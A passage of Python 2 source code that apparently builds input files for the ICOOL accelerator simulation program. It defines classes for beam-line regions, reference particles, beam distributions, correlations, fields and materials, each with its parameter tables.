"""EDGE Fringe field and other kicks for hard-edged field models
1) edge type (A4) {SOL, DIP, HDIP, DIP3, QUAD, SQUA, SEX, BSOL, FACE}
2.1) model # (I) {1}
2.2-5) p1, p2, p3,p4 (R) model-dependent parameters
Edge type = SOL
p1: BS [T]
If the main solenoid field is B, use p1=-B for the entrance edge and p1=+B for the exit edge.
Edge type = DIP
p1: BY [T]
Edge type = HDIP
p1: BX [T]
Edge type = DIP3
p1: rotation angle [deg]
p2: BY0 [T]
p3: flag 1:in 2:out
Edge type = QUAD
p1: gradient [T/m]
Edge type = SQUA
p1: gradient [T/m]
Edge type = SEX
p1: b2 [T/m2] (cf. C. Wang & L. Teng, MC 207)
Edge type = BSOL
p1: BS [T]
p2: BY [T]
p3: 0 for entrance face, 1 for exit face
Edge type = FACE
This gives vertical focusing from rotated pole faces.
p1: pole face angle [deg]
p2: radius of curvature of reference particle [m]
p3: if not 0 => correct kick by factor 1/(1+delta)
p4: if not 0 ==> apply horizontal focus with strength = (-vertical strength)
If a FACE command is used before and after a sector dipole (DIP), you can approximate a rectangular dipole field.
The DIP, HDIP, QUAD, SQUA, SEX and BSOL edge types use Scott Berg's HRDEND routine to find the change in transverse
position and transverse momentum due to the fringe field.
"""
def __init__(
self,
edge_type,
model,
model_parameters_list,
name=None,
metadata=None):
PseudoRegion.__init__(self, name, metadata)
self.edge_type = edge_type
self.model = model
        self.model_parameters = model_parameters_list
class Cell(RegularRegionContainer):
"""CELL Start of a repeating group of region commands; the data must end with an ENDCELL command.
    The cell loop can enclose any number of the commands allowed inside REPEAT, as well as REPEAT
    and ENDREPEAT commands themselves.
It has an associated cell field, which is superimposed on the individual region fields. Cell sections cannot
be nested in other cell sections. (see parameters below)
"""
begtag = 'CELL'
endtag = 'ENDCELL'
num_params = 3
for001_format = {'line_splits': [1, 1, 1]}
allowed_enclosed_commands = [
'SRegion',
'Aperture',
'Dens',
'Disp',
'Dummy',
'DVar',
'Edge',
'Output',
'Refp',
'Ref2',
'Reset',
'RKick',
'Rotate',
'Tilt',
'Transport',
'Repeat']
command_params = {
'ncells': {
'desc': 'Number of times to repeat this command in this cell block',
'doc': '',
'type': 'Integer',
'req': True,
'pos': 1},
'flip': {
'desc': 'if .true. => flip cell field for alternate cells',
'doc': '',
'type': 'Logical',
'req': True,
'pos': 2},
'field': {
'desc': 'Field object',
'doc': '',
'type': 'Field',
'req': True,
'pos': 3},
}
def __init__(self, **kwargs):
RegularRegion.__init__(self, kwargs)
Container.__init__(self)
def __setattr__(self, name, value):
Container.__setattr__(self, name, value)
def __str__(self):
return_str = 'CELL\n' + str(Container.__str__(self)) + 'ENDCELL\n'
# for command in self.enclosed_commands:
# return_str += str(command)
return return_str
def __repr__(self):
return 'Cell\n'
class SRegion(RegularRegionContainer):
"""
SREGION - Start of new s-region. Describes field and material properties.
Parameters:
1.1) SLEN (R) Length of this s region [m]
1.2) NRREG (I) # of radial subregions of this s region {1-4}
1.3) ZSTEP (R) step for tracking particles [m]
Note that for fixed-stepping the program may modify this value slightly to get
an integral number of steps in the region.
The following parameters are repeated for each r subregion:
2.1) IRREG (I) r-region number
2.2) RLOW (R) Inner radius of this r subregion[m]
2.3) RHIGH (R) Outer radius of this r subregion[m]
3) FTAG (A4) Tag identifying field in this r subregion
(See specific field type below)
4) FPARM (R) 15 parameters describing field (see specific field type below)
These 15 parameters must be on one input line.
5) MTAG (2A4) Tag identifying material composition in this r subregion
The wedge geometry can accept a second MTAG parameter.
The first material refers to the interior of the wedge.
The second material, if present, refers to the exterior of the wedge.
If a second MTAG parameter is not present, vacuum is assumed. (see specific material type below)
6) MGEOM (A6) Tag identifying material geometry in this r subregion.
(see specific material type below)
7) GPARM (R) 10 Parameters describing material geometry.
These 10 parameters must be on one input line (see specific material type below)
"""
allowed_enclosed_commands = ['SubRegion']
begtag = 'SREGION'
endtag = ''
num_params = 3
for001_format = {'line_splits': [3]}
command_params = {
'slen': {
'desc': 'Length of this s region [m]',
'doc': '',
'type': 'Real',
'req': True,
'pos': 1},
'nrreg': {
'desc': '# of radial subregions of this s region {1-4}',
'doc': '',
'type': 'Int',
'min': 1,
'max': 4,
'req': True,
'pos': 2},
'zstep': {
'desc': 'Step for tracking particles [m]',
'doc': '',
'type': 'Real',
'req': True,
'pos': 3},
#'outstep': {
# 'desc': 'Step for generating OUTPUT commands within SRegion.',
# 'doc': 'Will wrap SRegion in REPEAT/ENDREPEAT statements.',
# 'type': 'Real',
# 'req': False,
# 'pos': None}
}
def __init__(self, **kwargs):
RegularRegion.__init__(self, kwargs)
Container.__init__(self)
def __str__(self):
ret_str = 'SRegion:\n' + 'slen=' + str(self.slen) + '\n' + 'nrreg=' + str(self.nrreg) + '\n' + \
'zstep=' + str(self.zstep) + '\n' + str(Container.__str__(self))
return ret_str
def __repr__(self):
return 'SRegion:\n ' + 'slen=' + \
str(self.slen) + '\n' + 'nrreg=' + str(self.nrreg) + \
'\n' + 'zstep=' + str(self.zstep)
def __setattr__(self, name, value):
Container.__setattr__(self, name, value)
def add_subregion(self, subregion):
try:
if self.check_type('SubRegion', subregion):
if not hasattr(self, 'subregions'):
self.subregions = []
self.subregions.append(subregion)
else:
raise ie.InvalidType('SubRegion', subregion.__class__.__name__)
except ie.InvalidType as e:
print e
def add_subregions(self, subregion_list):
        for subregion in subregion_list:
            # Route through add_subregion so type checking and list
            # initialization happen for each element.
            self.add_subregion(subregion)
"""def gen_for001(self, file):
if hasattr(self, 'outstep'):
sreg_copy = copy.deepcopy(self)
delattr(sreg_copy, 'outstep')
sreg_copy.slen = self.outstep
nrep = int(self.slen/self.outstep)
r = Repeat(nrep=nrep)
r.add_enclosed_command(sreg_copy)
r.gen_for001(file)
else:
RegularRegionContainer.gen_for001(self, file)"""
class SubRegion(RegularRegion):
"""
A SubRegion is a:
(1) IRREG r-region number;
    (2) RLOW Inner radius of this r subregion;
(3) RHIGH Outer radius of this r subregion;
(4) Field object; and
(5) Material object.
"""
num_params = 5
for001_format = {'line_splits': [3, 1, 1]}
command_params = {
'irreg': {'desc': 'R-Region Number',
'doc': '',
'type': 'Integer',
'req': True,
'pos': 1},
'rlow': {'desc': 'Inner radius of this r subregion',
'doc': '',
'type': 'Real',
'req': True,
'pos': 2},
'rhigh': {'desc': 'Outer radius of this r subregion',
'doc': '',
'type': 'Real',
'req': True,
'pos': 3},
'field': {'desc': 'Field object',
'doc': '',
'type': 'Field',
'req': True,
'pos': 4},
'material': {'desc': 'Material object',
'doc': '',
'type': 'Material',
'req': True,
'pos': 5}
}
def __init__(self, **kwargs):
RegularRegion.__init__(self, kwargs)
def __str__(self):
return 'SubRegion:\n' + 'irreg=' + str(self.irreg) + '\n' + 'rlow=' + str(self.rlow) + '\n' + \
'rhigh=' + str(self.rhigh) + '\n' + 'Field=' + \
str(self.field) + '\n' + \
'Material=' + str(self.material)
def __repr__(self):
return 'SubRegion:\n' + 'irreg=' + str(self.irreg) + '\n' + 'rlow=' + str(self.rlow) + '\n' + \
'rhigh=' + str(self.rhigh) + '\n' + 'Field=' + \
str(self.field) + '\n' + \
'Material=' + str(self.material)
def __setattr__(self, name, value):
Region.__setattr__(self, name, value)
class ModeledCommandParameter(ICoolObject):
def __init__(self, kwargs):
"""
Checks to see whether all required parameters are specified. If not, raises exception and exits.
"""
if self.check_command_params_init(kwargs) is False:
sys.exit(0)
else:
if self.check_no_model():
return
else:
setattr(
self,
self.get_model_descriptor_name(),
self.get_model_name_in_dict(kwargs))
del kwargs[self.get_model_descriptor_name()]
self.setall(kwargs)
def __call__(self, kwargs):
if self.check_command_params_call(kwargs) is False:
sys.exit(0)
else:
if not self.get_model_descriptor_name() in kwargs.keys():
ICoolObject.__call__(self, kwargs)
else:
setattr(
self,
self.get_model_descriptor_name(),
self.get_model_name_in_dict(kwargs))
del kwargs[self.get_model_descriptor_name()]
self.setall(kwargs)
def __setattr__(self, name, value):
# Check whether the attribute being set is the model
if name == self.get_model_descriptor_name():
if self.check_valid_model(value) is False:
return
            new_model = False
            # Check whether a model was previously defined; if so, this is a
            # model change and the old model's attributes must be cleared
            # before the new model's parameters are installed.
            if hasattr(self, self.get_model_descriptor_name()):
                new_model = True
                # Delete all attributes of the current model
                print 'Resetting model to ', value
                self.reset_model()
object.__setattr__(self, self.get_model_descriptor_name(), value)
# If new model, set all attributes of new model to 0.
if new_model is True:
self.set_and_init_params_for_model(value)
return
try:
if self.check_command_param(name):
if self.check_command_param_type(name, value):
object.__setattr__(self, name, value)
else:
raise ie.SetAttributeError('', self, name)
except ie.InvalidType as e:
print e
except ie.SetAttributeError as e:
print e
def __str__(self):
desc = 'ModeledCommandParameter\n'
for key in self.get_model_dict(
getattr(
self,
self.get_model_descriptor_name())):
desc = desc + key + ': ' + str(getattr(self, key)) + '\n'
return desc
def set_keyword_args_model_specified(self, kwargs):
setattr(
self,
self.get_model_descriptor_name(),
kwargs[
self.get_model_descriptor_name()])
for key in kwargs:
if not key == self.get_model_descriptor_name():
setattr(self, key, kwargs[key])
def set_keyword_args_model_not_specified(self, kwargs):
for key in kwargs:
object.__setattr__(self, key, kwargs[key])
def reset_model(self):
for key in self.get_model_parms_dict():
if hasattr(self, key):
delattr(self, key)
def set_and_init_params_for_model(self, model):
for key in self.get_model_dict(model):
if key is not self.get_model_descriptor_name():
setattr(self, key, 0)
def check_command_params_init(self, command_params):
"""
Checks if ALL keywords for a model are specified. If not, raises InputArgumentsError.
If model is not specified, raises ModelNotSpecifiedError.
        Initialization of a model (e.g., Accel, SOL, etc.) requires all keywords to be specified.
"""
if self.check_no_model():
return True
if not self.check_model_specified(command_params):
return False
else:
if not self.check_valid_model(
self.get_model_name_in_dict(command_params)):
return False
else:
command_params_dict = self.get_command_params_for_specified_input_model(
command_params)
if not self.check_command_params_valid(command_params, command_params_dict) \
or not self.check_all_required_command_params_specified(command_params, command_params_dict) \
or not self.check_command_params_type(command_params, command_params_dict):
return False
else:
return True
def check_command_params_call(self, command_params):
"""
Checks to see whether new model specified in call.
        If so, checks that the parameters specified correspond to that model and raises an exception if they don't.
Does NOT require all parameters specified for new model. Unspecified parameters are set to 0.
If model is not specified, checks whether the parameters specified correspond to the current model and
raises an exception otherwise.
"""
if not self.get_model_descriptor_name() in command_params.keys():
command_params_dict = self.get_model_parms_dict()
if not self.check_command_params_valid(command_params, command_params_dict) \
or not self.check_command_params_type(command_params, command_params_dict):
return False
else:
return True
else:
return self.check_command_params_init(command_params)
def check_valid_model(self, model):
"""
Checks whether model specified is valid.
If model is not valid, raises an exception and returns False. Otherwise returns True.
"""
try:
if not str(model) in self.get_model_names():
raise ie.InvalidModel(str(model), self.get_model_names())
except ie.InvalidModel as e:
print e
return False
return True
def check_partial_keywords_for_current_model(self, input_dict):
"""
Checks whether the keywords specified for a current model correspond to that model.
"""
actual_dict = self.get_model_dict(
getattr(
self,
self.get_model_descriptor_name()))
for key in input_dict:
if key not in actual_dict:
raise ie.InputArgumentsError(
'Input Arguments Error',
input_dict,
actual_dict)
return True
def check_partial_keywords_for_new_model(self, input_dict):
"""
Checks whether the keywords specified for a new model correspond to that model.
"""
model = input_dict[self.get_model_descriptor_name()]
actual_dict = self.get_model_dict(model)
for key in input_dict:
if key not in actual_dict:
raise ie.InputArgumentsError(
'Input Arguments Error',
input_dict,
actual_dict)
return True
def check_model_specified(self, input_dict):
"""
        Check whether the user specified a model when passing parameters to __init__ or __call__.
        If so, returns True. Otherwise, raises an exception and returns False.
"""
try:
if not self.get_model_descriptor_name() in input_dict.keys():
raise ie.ModelNotSpecified(self.get_model_names())
except ie.ModelNotSpecified as e:
print e
return False
return True
def check_no_model(self):
if self.get_model_descriptor_name() is None:
return True
else:
return False
# Helper functions
##################################################
def get_model_descriptor(self):
"""Returns the model descriptor dictionary"""
return self.models['model_descriptor']
def get_model_descriptor_name(self):
"""
        The model descriptor name is an alias for the term 'model', which is specified for each descendant class.
Returns the model descriptor name.
"""
return self.get_model_descriptor()['name']
def get_current_model_name(self):
"""Returns the name of the current model"""
return getattr(self, self.get_model_descriptor_name())
def get_model_parms_dict(self):
"""
Returns the parameter dictionary for the current model.
"""
if self.get_model_descriptor_name() is None:
return {}
else:
return self.get_model_dict(self.get_current_model_name())
def get_model_dict(self, model):
"""
Returns the parameter dictionary for model name.
"""
return self.models[str(model)]['parms']
def get_num_params(self):
"""
Returns the number of parameters for model.
"""
return self.get_model_descriptor()['num_parms']
def get_icool_model_name(self):
"""Check to see whether there is an alternate icool_model_name from the common name.
If so return that. Otherwise, just return the common name."""
if 'icool_model_name' not in self.models[
str(self.get_current_model_name())]:
return self.get_current_model_name()
else:
return self.models[str(self.get_current_model_name())][
'icool_model_name']
def get_model_names(self):
"""Returns a list of all model names"""
ret_list = self.models.keys()
pos = ret_list.index('model_descriptor')
del ret_list[pos]
return ret_list
def get_model_name_in_dict(self, dict):
"""Returns the model name in a provided dictionary if it exists. Otherwise returns None"""
if self.get_model_descriptor_name() not in dict:
return None
else:
return dict[self.get_model_descriptor_name()]
def get_command_params(self):
return self.get_model_parms_dict()
def get_command_params_for_specified_input_model(
self,
input_command_params):
specified_model = input_command_params[
self.get_model_descriptor_name()]
return self.get_model_dict(specified_model)
def get_line_splits(self):
return self.models['model_descriptor']['for001_format']['line_splits']
##################################################
def set_model_parameters(self):
parms_dict = self.get_model_parms_dict()
high_pos = 0
for key in parms_dict:
            if parms_dict[key]['pos'] > high_pos:
                high_pos = parms_dict[key]['pos']
self.parms = [0] * high_pos
def gen_parm(self):
num_parms = self.get_num_params()
command_params = self.get_command_params()
parm = [0] * num_parms
for key in command_params:
pos = int(command_params[key]['pos']) - 1
if key == self.get_model_descriptor_name():
val = self.get_icool_model_name()
print 'Using icool name', val
else:
val = getattr(self, key)
parm[pos] = val
print parm
return parm
def gen_for001(self, file):
if hasattr(self, 'begtag'):
print 'Writing begtag'
# file.write('\n')
file.write(self.get_begtag())
file.write('\n')
parm = self.gen_parm()
splits = self.get_line_splits()
count = 0
split_num = 0
cur_split = splits[split_num]
for i in parm:
if count == cur_split:
file.write('\n')
count = 0
split_num = split_num + 1
cur_split = splits[split_num]
file.write(str(i))
file.write(' ')
count = count + 1
file.write('\n')
if hasattr(self, 'endtag'):
print 'Writing endtag'
file.write('\n')
file.write(self.get_endtag())
file.write('\n')
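# Layout note (sketch of the mechanism above): gen_parm places each attribute
# at index (pos - 1) in a flat list, and gen_for001 breaks that list into
# output lines using the model's line_splits entry. For instance,
# num_parms = 13 with line_splits = [1, 6, 6] would emit
#
#     p1
#     p2 p3 p4 p5 p6 p7
#     p8 p9 p10 p11 p12 p13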
class Refp(ModeledCommandParameter, PseudoRegion):
"""
Reference particle
"""
begtag = 'REFP'
endtag = ''
models = {
'model_descriptor': {'desc': 'Phase model',
'name': 'phmodref',
'num_parms': 5,
'for001_format': {'line_splits': [5]}},
'0_crossing':
{'desc': '0-crossing phase iterative procedure',
         'doc': 'Uses iterative procedure to find 0-crossing phase; tracks through all regions. Only works with ACCEL models 1, 2 and 13.',
'icool_model_name': 2,
'parms':
{'phmodref': {'pos': 5, 'type': 'String', 'doc': ''},
'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''}}},
'const_v':
{'desc': 'Assumes constant reference particle velocity',
'doc': 'Applies to any region',
'icool_model_name': 3,
'parms':
{'phmodref': {'pos': 5, 'type': 'String', 'doc': ''},
'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''},
'pz0': {'pos': 2, 'type': 'Real', 'doc': ''},
't0': {'pos': 3, 'type': 'Real', 'doc': ''}}},
'en_loss':
        {'desc': 'Assumes constant reference particle energy loss dE/dz',
'doc': 'Applies to any region',
'icool_model_name': 4,
'parms':
{'phmodref': {'pos': 5, 'type': 'String', 'doc': ''},
'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''},
'pz0': {'pos': 2, 'type': 'Real', 'doc': ''},
't0': {'pos': 3, 'type': 'Real', 'doc': ''},
'dedz': {'pos': 4, 'type': 'Real', 'doc': ''}}},
'delta_quad_cav':
        {'desc': 'Assumes quadratic variation of reference particle energy in cavities',
'doc': 'Applies to any region',
'icool_model_name': 5,
'parms':
{'phmodref': {'pos': 5, 'type': 'String', 'doc': ''},
'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''},
'e0': {'pos': 2, 'type': 'Real', 'doc': ''},
'dedz': {'pos': 3, 'type': 'Real', 'doc': ''},
'd2edz2': {'pos': 4, 'type': 'Real', 'doc': ''}}},
'delta_quad_any':
        {'desc': 'Assumes quadratic variation of reference particle energy in any region',
'doc': 'Applies to any region',
'icool_model_name': 6,
'parms':
{'phmodref': {'pos': 5, 'type': 'String', 'doc': ''},
'bmtype': {'pos': 1, 'type': 'Int', 'doc': ''},
'e0': {'pos': 2, 'type': 'Real', 'doc': ''},
'dedz': {'pos': 3, 'type': 'Real', 'doc': ''},
'd2edz2': {'pos': 4, 'type': 'Real', 'doc': ''}}},
}
def __init__(self, **kwargs):
ModeledCommandParameter.__init__(self, kwargs)
def __call__(self, **kwargs):
ModeledCommandParameter.__call__(self, kwargs)
def __setattr__(self, name, value):
ModeledCommandParameter.__setattr__(self, name, value)
def __str__(self):
return ModeledCommandParameter.__str__(self)
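# Usage sketch: a constant-velocity reference particle. All keyword values
# below are illustrative assumptions (bmtype=2 denotes a muon).
#
#     refp = Refp(phmodref='const_v', bmtype=2, pz0=0.2, t0=0.0)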
class Distribution(ModeledCommandParameter):
"""
A Distribution is a:
(1) bdistyp (I) beam distribution type {1:Gaussian 2:uniform circular segment}
(2-13) 12 Parameters for bdistyp
"""
models = {
'model_descriptor': {'desc': 'Distribution type',
'name': 'bdistyp',
'num_parms': 13,
'for001_format': {'line_splits': [1, 6, 6]}},
'gaussian':
{'desc': 'Gaussian beam distribution',
'doc': '',
'icool_model_name': 1,
'parms':
{'bdistyp': {'pos': 1, 'type': 'String', 'doc': ''},
'x_mean': {'pos': 2, 'type': 'Real', 'doc': ''},
'y_mean': {'pos': 3, 'type': 'Real', 'doc': ''},
'z_mean': {'pos': 4, 'type': 'Real', 'doc': ''},
'px_mean': {'pos': 5, 'type': 'Real', 'doc': ''},
'py_mean': {'pos': 6, 'type': 'Real', 'doc': ''},
'pz_mean': {'pos': 7, 'type': 'Real', 'doc': ''},
'x_std': {'pos': 8, 'type': 'Real', 'doc': ''},
'y_std': {'pos': 9, 'type': 'Real', 'doc': ''},
'z_std': {'pos': 10, 'type': 'Real', 'doc': ''},
'px_std': {'pos': 11, 'type': 'Real', 'doc': ''},
'py_std': {'pos': 12, 'type': 'Real', 'doc': ''},
'pz_std': {'pos': 13, 'type': 'Real', 'doc': ''}}},
'uniform':
{'desc': 'Uniform circular segment beam distribution',
'doc': '',
'icool_model_name': 2,
'parms':
{'bdistyp': {'pos': 1, 'type': 'String', 'doc': ''},
'r_low': {'pos': 2, 'type': 'Real', 'doc': ''},
'r_high': {'pos': 3, 'type': 'Real', 'doc': ''},
'phi_low': {'pos': 4, 'type': 'Real', 'doc': ''},
'phi_high': {'pos': 5, 'type': 'Real', 'doc': ''},
'z_low': {'pos': 6, 'type': 'Real', 'doc': ''},
'z_high': {'pos': 7, 'type': 'Real', 'doc': ''},
'pr_low': {'pos': 8, 'type': 'Real', 'doc': ''},
'pr_high': {'pos': 9, 'type': 'Real', 'doc': ''},
'pphi_low': {'pos': 10, 'type': 'Real', 'doc': ''},
'pphi_high': {'pos': 11, 'type': 'Real', 'doc': ''},
'pz_low': {'pos': 12, 'type': 'Real', 'doc': ''},
'pz_high': {'pos': 13, 'type': 'Real', 'doc': ''}}},
}
def __init__(self, **kwargs):
ModeledCommandParameter.__init__(self, kwargs)
def __call__(self, **kwargs):
ModeledCommandParameter.__call__(self, kwargs)
def __setattr__(self, name, value):
ModeledCommandParameter.__setattr__(self, name, value)
def __str__(self):
return ModeledCommandParameter.__str__(self)
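# Usage sketch: a Gaussian beam distribution; initialization requires every
# keyword of the chosen model to be supplied. All numeric values are
# illustrative assumptions.
#
#     dist = Distribution(bdistyp='gaussian',
#                         x_mean=0., y_mean=0., z_mean=0.,
#                         px_mean=0., py_mean=0., pz_mean=0.2,
#                         x_std=0.01, y_std=0.01, z_std=0.05,
#                         px_std=0.005, py_std=0.005, pz_std=0.01)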
class Correlation(ModeledCommandParameter):
"""
A Correlation is a:
(1) CORRTYP (I) correlation type
(2) CORR1(i) (R) correlation parameter 1
(3) CORR2(i) (R) correlation parameter 2
(4) CORR3(i) (R) correlation parameter 3
"""
models = {
'model_descriptor': {
'desc': 'Correlation type',
'name': 'corrtyp',
'num_parms': 4,
'for001_format': {
'line_splits': [4]}
},
'ang_mom': {
'desc': 'Angular momentum appropriate for constant solenoid field',
'doc': '',
'icool_model_name': 1,
'parms': {
'corrtyp': {
'pos': 1, 'type': 'String', 'doc': ''},
'sol_field': {
'pos': 2, 'type': 'Real', 'doc': ''}}},
'palmer': {
'desc': 'Palmer amplitude correlation',
'doc': '', 'icool_model_name': 2,
'parms': {
'corrtyp': {
'pos': 1, 'type': 'String', 'doc': ''},
'strength': {
'pos': 2, 'type': 'Real', 'doc': ''},
'beta_eff': {
'pos': 3, 'type': 'Real', 'doc': ''}}},
'rf_bucket_ellipse': {
'desc': 'Rf bucket, small amplitude ellipse',
'doc': '', 'icool_model_name': 3,
'parms': {
'corrtyp': {
'pos': 1, 'type': 'String', 'doc': ''},
'e_peak': {
'pos': 2, 'type': 'Real', 'doc': ''},
'phase': {
'pos': 3, 'type': 'Real', 'doc': ''},
'freq': {
'pos': 4, 'type': 'Real', 'doc': ''}}},
'rf_bucket_small_separatrix': {
'desc': 'Rf bucket, small amplitude separatrix',
'doc': '', 'icool_model_name': 4,
'parms': {
'corrtyp': {
'pos': 1, 'type': 'String', 'doc': ''},
'e_peak': {
'pos': 2, 'type': 'Real', 'doc': ''},
'phase': {
'pos': 3, 'type': 'Real', 'doc': ''},
'freq': {
'pos': 4, 'type': 'Real', 'doc': ''}}},
'rf_bucket_large_separatrix': {
            'desc': 'Rf bucket, large amplitude separatrix',
'doc': '', 'icool_model_name': 5,
'parms': {
'corrtyp': {
                    'pos': 1, 'type': 'String', 'doc': ''},
'e_peak': {
'pos': 2, 'type': 'Real', 'doc': ''},
'phase': {
'pos': 3, 'type': 'Real', 'doc': ''},
'freq': {
'pos': 4, 'type': 'Real', 'doc': ''}}},
'twiss_px': {
'desc': 'Twiss parameters in x Px',
'doc': '',
'icool_model_name': 6,
'parms': {
'corrtyp': {
'pos': 1, 'type': 'String', 'doc': ''},
'alpha': {
'pos': 2, 'type': 'Real', 'doc': ''},
'beta': {
'pos': 3, 'type': 'Real', 'doc': ''},
'epsilon': {
'pos': 4, 'type': 'Real', 'doc': ''}}},
'twiss_py': {
            'desc': 'Twiss parameters in y Py',
'doc': 'The spread in y and Py in the beam definition are ignored. '
'For Gaussian distributions epsilon is the rms geometrical '
'emittance. For uniform distributions it specifies the limiting ellipse.',
'icool_model_name': 7,
'parms': {
'corrtyp': {
'pos': 1, 'type': 'String', 'doc': ''},
'alpha': {
'pos': 2, 'type': 'Real', 'doc': 'Twiss alpha parameter [m]'},
'beta': {
'pos': 3, 'type': 'Real', 'doc': 'Twiss beta parameter [m]'},
'epsilon': {
'pos': 4, 'type': 'Real', 'doc': 'Twiss epsilon parameter [m]'}}},
'equal_sol': {
'desc': 'Equal time in solenoid.', 'doc': 'Set up with pz and σPz such that βz > βo. '
'Set up initial pt = 0. This correlation determines the pt '
'for a given pz that gives all the initial particles the same βo. '
'If parameter 3 is 0, the azimuthal angle is chosen randomly.',
'icool_model_name': 9,
'parms': {
'corrtyp': {
'pos': 1, 'type': 'String', 'doc': ''},
'axial_beta': {
'pos': 2, 'type': 'Real', 'doc': 'desired axial beta (=v/c) value βo'},
'az_ang_mom': {
'pos': 3, 'type': 'Real', 'doc': 'azimuthal angle of transverse momentum [deg]'}}},
'balbekov': {
'desc': 'Balbekov version of amplitude-energy.',
'doc': '',
'icool_model_name': 10,
'parms': {
'corrtyp': {
'pos': 1, 'type': 'String', 'doc': ''},
'eref': {
'pos': 2, 'type': 'Real', 'doc': 'Eref [GeV]'},
'babs': {
'pos': 3, 'type': 'Real', 'doc': 'Babs [ T ]'},
                'sigma_e': {
'pos': 4, 'type': 'Real', 'doc': 'σE [GeV]'}}},
'dispersion': {
'desc': 'Dispersion', 'doc': '',
'icool_model_name': 11,
'parms': {
'corrtyp': {
'pos': 1, 'type': 'String', 'doc': ''},
'value': {
'pos': 2, 'type': 'Real', 'doc': '[m or rad]'},
'pref': {
'pos': 3, 'type': 'Real', 'doc': '[GeV/c]'},
'type': {
'pos': 4, 'type': 'Real', 'doc': 'Type flag. x, y, x_prime, y_prime'}}}}
def __init__(self, **kwargs):
ModeledCommandParameter.__init__(self, kwargs)
def __call__(self, **kwargs):
ModeledCommandParameter.__call__(self, kwargs)
def __setattr__(self, name, value):
ModeledCommandParameter.__setattr__(self, name, value)
def __str__(self):
return self.corrtyp + ':' + 'Correlation:' + \
ModeledCommandParameter.__str__(self)
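# Usage sketch: an angular-momentum correlation appropriate for a constant
# solenoid field; the 2 T value is an illustrative assumption.
#
#     corr = Correlation(corrtyp='ang_mom', sol_field=2.0)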
class BeamType(Container):
"""
A BeamType is a:
(1) PARTNUM (I) particle number
(2) BMTYPE (I) beam type {magnitude = mass code; sign = charge}
1: e
2: μ
3: π
4: K
5: p
6: d
7: He3
8: Li7
    (3) FRACBT (R) fraction of beam of this type {0-1}. The sum of all fracbt(i) should equal 1.0.
(4) Distribution
(5) NBCORR # of beam correlations {0-10}
(6) From 0-10 enclosed Correlation objects as specified by NBCORR (5)
"""
allowed_enclosed_commands = ['Correlation']
command_params = {
'partnum': {
'desc': 'Particle number',
'doc': '',
'type': 'Integer',
'req': True,
'default': None},
'bmtype': {
'desc': 'beam type {magnitude = mass code; sign = charge}: 1: e, 2: μ, 3: π, 4: K, 5: p. '
'6: d, 7: He3, 8: Li7',
'doc': '',
'out_dict': {
'e': 1,
'mu': 2,
'pi': 3,
'k': 4,
'p': 5,
'd': 6,
'he3': 7,
'li7': 8},
'type': 'Integer',
'req': True,
'default': None},
'fractbt': {
            'desc': 'Fraction of beam of this type {0-1}. The sum of all fracbt(i) should equal 1.0',
'doc': '',
'type': 'Real',
'req': True,
'default': None},
'distribution': {
'desc': 'Beam distribution object',
'doc': '',
'type': 'Distribution',
'req': True,
'default': None},
'nbcorr': {
'desc': '# of beam correlations {0-10}',
'doc': '',
'type': 'Integer',
'req': True,
'default': 0,
'min': 0,
'max': 10}}
def __init__(self, **kwargs):
if self.check_command_params_init(kwargs) is False:
sys.exit(0)
ICoolObject.__init__(self, kwargs)
Container.__init__(self)
def __setattr__(self, name, value):
Container.__setattr__(self, name, value)
def __str__(self):
return 'BeamType: \n'
def __repr__(self):
return '[BeamType: ]'
def gen_for001(self, file):
file.write(str(self.partnum))
file.write(' ')
file.write(str(self.bmtype))
file.write(' ')
file.write(str(self.fractbt))
file.write('\n')
self.distribution.gen_for001(file)
file.write('\n')
file.write(str(self.nbcorr))
file.write('\n')
for c in self.enclosed_commands:
c.gen_for001(file)
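# Usage sketch: a single-species muon beam carrying a Distribution and one
# enclosed Correlation (dist and corr as sketched above; all values are
# illustrative assumptions).
#
#     bt = BeamType(partnum=1, bmtype=2, fractbt=1.0,
#                   distribution=dist, nbcorr=1)
#     bt.add_enclosed_command(corr)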
class Field(ModeledCommandParameter):
"""
A Field is a:
FTAG - A tag identifying the field. Valid FTAGS are:
    NONE, ACCEL, BLOCK, BROD, BSOL, COIL, DIP, EFLD, FOFO, HDIP, HELI(X),
    HORN, KICK, QUAD, ROD, SEX, SHEE(T), SOL, SQUA, STUS, WIG
FPARM - 15 parameters describing the field. The first parameter is the model.
"""
def __init__(self, ftag, kwargs):
ModeledCommandParameter.__init__(self, kwargs)
self.ftag = ftag
def __call__(self, kwargs):
ModeledCommandParameter.__call__(self, kwargs)
def __setattr__(self, name, value):
if name == 'fparm':
object.__setattr__(self, name, value)
else:
ModeledCommandParameter.__setattr__(self, name, value)
def __str__(self):
return self.ftag + ':' + 'Field:' + \
ModeledCommandParameter.__str__(self)
def gen_fparm(self):
        # Size the parameter list from the model descriptor (fields carry
        # 15 parameters) rather than a hard-coded 10.
        self.fparm = [0] * self.get_num_params()
cur_model = self.get_model_dict(self.model)
for key in cur_model:
pos = int(cur_model[key]['pos']) - 1
if key == self.get_model_descriptor_name():
val = self.get_icool_model_name()
else:
val = getattr(self, key)
self.fparm[pos] = val
print self.fparm
class Material(ModeledCommandParameter):
"""
A Material is a:
(1) MTAG (A) material composition tag
(2) MGEOM (A) material geometry tag
(3-12) GPARM (R) 10 parameters that describe the geometry of the material
Enter MTAG in upper case.
Valid MTAG'S are:
VAC vacuum (i.e., no material)
GH gaseous hydrogen
GHE gaseous helium
LH liquid hydrogen
LHE liquid helium
LI BE B C AL TI FE CU W HG PB (elements)
LIH lithium hydride
CH2 polyethylene
SS stainless steel (alloy 304)
Valid MGEOM's are:
NONE use for vacuum
10*0.
CBLOCK cylindrical block
10*0.
...
"""
materials = {
'VAC': {'desc': 'Vacuum (no material)', 'icool_material_name': ''},
'GH': {'desc': 'Gaseous hydrogen'},
'GHE': {'desc': 'Gaseous helium'},
'LH': {'desc': 'Liquid hydrogen'},
'LHE': {'desc': 'Liquid helium'},
'LI': {'desc': 'Lithium'},
        'BE': {'desc': 'Beryllium'},
'B': {'desc': 'Boron'},
'C': {'desc': 'Carbon'},
'AL': {'desc': 'Aluminum'},
'TI': {'desc': 'Titanium'},
'FE': {'desc': 'Iron'},
'CU': {'desc': 'Copper'},
'W': {'desc': 'Tungsten'},
        'HG': {'desc': 'Mercury'},
        'PB': {'desc': 'Lead'}
}
models = {
'model_descriptor': {
'desc': 'Geometry',
'name': 'geom',
